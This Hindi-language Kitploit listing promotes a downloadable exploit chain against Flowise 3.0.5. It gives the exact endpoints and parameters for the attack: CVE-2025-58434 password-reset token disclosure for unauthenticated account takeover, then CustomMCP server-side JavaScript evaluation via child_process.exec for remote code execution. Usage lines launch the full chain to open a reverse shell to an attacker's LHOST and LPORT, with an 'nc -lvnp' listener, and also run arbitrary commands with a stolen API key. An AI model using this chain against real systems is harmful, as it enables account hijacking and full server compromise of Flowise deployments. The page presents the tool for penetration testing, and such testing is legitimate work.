Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434 — # Flowise 3.0.5 के लिए शोषण श्रृंखला: पासवर्ड-रीसेट टोकन प्रकटीकरण (CVE-2025-58434) के माध्यम से बिना प्रमाणीकरण के खाता अधिग्रहण, जो रिमोट कोड निष्पादन के लिए CustomMCP JavaScript मूल्यांकन से जुड़ा हुआ है। | Kitploit
उपकरण/GitHubGitHub/r3vpwnx/cve-2025-58434
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

# Flowise 3.0.5 के लिए शोषण श्रृंखला: पासवर्ड-रीसेट टोकन प्रकटीकरण (CVE-2025-58434) के माध्यम से बिना प्रमाणीकरण के खाता अधिग्रहण, जो रिमोट कोड निष्पादन के लिए CustomMCP JavaScript मूल्यांकन से जुड़ा हुआ है।

रिपॉजिटरी देखें
1 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58434 - Flowise अनधिकृत खाता अधिग्रहण, CustomMCP RCE से जुड़ा हुआ

Flowise 3.0.5 की दो समस्याएं, एक साथ जुड़ी हुई:

  1. CVE-2025-58434 - पासवर्ड-रीसेट टोकन प्रकटीकरण। POST /api/v1/account/forgot-password लक्षित उपयोगकर्ता के tempToken को सीधे JSON प्रतिक्रिया में लौटाता है। इसे POST /api/v1/account/reset-password में फीड करें ताकि किसी भी खाते के लिए एक ज्ञात पासवर्ड सेट किया जा सके, जिसमें पहला एडमिन भी शामिल है -> पूर्ण अनधिकृत खाता अधिग्रहण।
  2. CustomMCP mcpServerConfig सर्वर-साइड JavaScript मूल्यांकन। एक सत्र और वर्कस्पेस API कुंजी (चरण 1 से) के साथ, POST /api/v1/node-load-method/customMCP जिसमें loadMethod=listActions है, Flowise प्रक्रिया में mcpServerConfig स्ट्रिंग का JavaScript के रूप में मूल्यांकन करता है, जिससे require('child_process').exec() RCE प्राप्त होता है। (यहां केवल ATO को कोड निष्पादन में बदलने के लिए उपयोग की गई अलग Flowise समस्या; लेखन के समय कोई CVE निर्दिष्ट नहीं है।)

CVE: CVE-2025-58434

आवश्यकताएं

root@kitploit:~
python3 -m pip install requests

उपयोग

flowise_ato_foothold.py - पूर्ण श्रृंखला (ATO -> API कुंजी -> CustomMCP रिवर्स शेल)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# `nc -lvnp <LPORT>` तैयार रखें

flowise_customMCP_rce.py - केवल CustomMCP RCE (API कुंजी की आवश्यकता है)

root@kitploit:~
python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

संदर्भ

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसे केवल उन्हीं सिस्टमों के विरुद्ध चलाएं जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।


लेखक: r3vpwnx

टूल डाउनलोड करें